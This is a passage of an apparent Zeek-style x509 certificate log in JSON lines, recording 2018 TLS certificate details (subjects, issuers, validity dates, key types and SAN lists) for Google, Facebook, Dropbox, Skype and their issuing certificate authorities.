Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.368324Z","id":"FyBA112fGV31EFqHgj","certificate.version":3,"certificate.serial":"0559086565C1523E2453C13561F4D68A","certificate.subject":"CN=*.facebook.com,O=Facebook\u005c, Inc.,L=Menlo Park,ST=CA,C=US","certificate.issuer":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2015-04-10T07:00:00.000000Z","certificate.not_valid_after":"2015-10-14T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.facebook.com","facebook.com","*.fb.com","*.fbsbx.com","*.fbcdn.net","*.xx.fbcdn.net","*.xy.fbcdn.net","fb.com","*.facebookcorewwwi.onion","facebookcorewwwi.onion","*.fbcdn23dssr3jqnq.onion","fbcdn23dssr3jqnq.onion","*.fbsbx2q4mvcl63pw.onion","fbsbx2q4mvcl63pw.onion","*.m.facebook.com","*.messenger.com","messenger.com","*.m.facebookcorewwwi.onion","m.facebookcorewwwi.onion","*.xx.fbcdn23dssr3jqnq.onion","xx.fbcdn23dssr3jqnq.onion","*.xy.fbcdn23dssr3jqnq.onion","xy.fbcdn23dssr3jqnq.onion","*.xz.fbcdn.net","xz.fbcdn.net","*.xz.fbcdn23dssr3jqnq.onion","xz.fbcdn23dssr3jqnq.onion"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.368324Z","id":"FlJgXAqvrzzr9edq","certificate.version":3,"certificate.serial":"0A5F114D035B179117D2EFD4038C3F3B","certificate.subject":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2008-04-02T19:00:00.000000Z","certificate.not_valid_after":"2022-04-03T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.437493Z","id":"FQMJsi2EYKt84iWqhe","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.437493Z","id":"FekfZclTcRpQkElEl","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.437493Z","id":"FHUSgH3D5a6Tee7E54","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.514251Z","id":"FR2Eo34264piO8o7H1","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.514251Z","id":"Fah2aX1nUJt1YmeCrh","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.514251Z","id":"FSl9j222ANzSAC6sZ1","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.466504Z","id":"FVEhWQGOwWLsMPo82","certificate.version":3,"certificate.serial":"6B70469241B9EC07","certificate.subject":"CN=*.googleusercontent.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:43:51.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.googleusercontent.com","*.blogspot.com","*.bp.blogspot.com","*.commondatastorage.googleapis.com","*.doubleclickusercontent.com","*.ggpht.com","*.googledrive.com","*.googlesyndication.com","*.sandbox.googleusercontent.com","*.storage.googleapis.com","blogspot.com","bp.blogspot.com","commondatastorage.googleapis.com","doubleclickusercontent.com","ggpht.com","googledrive.com","googleusercontent.com","static.panoramio.com.storage.googleapis.com","storage.googleapis.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.466504Z","id":"FtRNcAHqbhqfTeWN6","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.466504Z","id":"Fy5I1v4elaSqXqkoXl","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.348419Z","id":"FbxRcY2bCGA16B72Jg","certificate.version":3,"certificate.serial":"5A0000D4A15F58124C4688433B00010000D4A1","certificate.subject":"CN=*.config.skype.com","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-26T03:32:42.000000Z","certificate.not_valid_after":"2017-03-25T03:32:42.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.config.skype.com"]} +{"ts":"2018-08-03T23:39:00.348419Z","id":"FiSceY2Hh1JpTJgBra","certificate.version":3,"certificate.serial":"07279AA9","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2013-12-20T04:07:32.000000Z","certificate.not_valid_after":"2017-12-20T04:06:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.395342Z","id":"F2DOG2MbMbsIh6jV6","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.395342Z","id":"FTK8M9DYdLeHSBBq6","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.395342Z","id":"Fb3Kbq14mRzmHObeVk","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.878898Z","id":"FtlHA433OEM5y0Hfik","certificate.version":3,"certificate.serial":"5A0000D4A15F58124C4688433B00010000D4A1","certificate.subject":"CN=*.config.skype.com","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-26T03:32:42.000000Z","certificate.not_valid_after":"2017-03-25T03:32:42.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.config.skype.com"]} +{"ts":"2018-08-03T23:39:00.878898Z","id":"Fb0sUW2ZJCaGdVkIK3","certificate.version":3,"certificate.serial":"07279AA9","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2013-12-20T04:07:32.000000Z","certificate.not_valid_after":"2017-12-20T04:06:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.868553Z","id":"FgzoGVsJ4dDJN6lP6","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.868553Z","id":"FXgSsI27dOf0BX6rNk","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.868553Z","id":"F4acOX3bcgoThZWyIe","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.900498Z","id":"FcU8ysE9kqmMVC3Wl","certificate.version":3,"certificate.serial":"5A0000D4A15F58124C4688433B00010000D4A1","certificate.subject":"CN=*.config.skype.com","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-26T03:32:42.000000Z","certificate.not_valid_after":"2017-03-25T03:32:42.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.config.skype.com"]} +{"ts":"2018-08-03T23:39:00.900498Z","id":"F24LWEhFoj9oBE5oa","certificate.version":3,"certificate.serial":"07279AA9","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2013-12-20T04:07:32.000000Z","certificate.not_valid_after":"2017-12-20T04:06:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.920030Z","id":"FuDTVofTwYyOl6td7","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.920030Z","id":"FLxC941vn6IhRsNjf","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.920030Z","id":"Fpfj4i2FsZUIw4Blog","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.886255Z","id":"FzO39g3UAMlLTbno8k","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:00.886255Z","id":"FrMi5y4SMKcHB7yea1","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:00.886255Z","id":"FGi8lR2UEkFDNDTDaf","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.016845Z","id":"FWt5Rk2am8SMFZ8rej","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.016845Z","id":"FYMzas11KaGH4OGgBa","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.016845Z","id":"FFHT1T1i4TWy42jH0c","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.014723Z","id":"Fdq6xe4tHSxc5Ax0gk","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.014723Z","id":"FTs4hn3Y63UHaImJGj","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.014723Z","id":"FzA2Vg1sDTlv3k1f2h","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:00.952537Z","id":"FB4ERj4qzcw4j6Amxf","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} 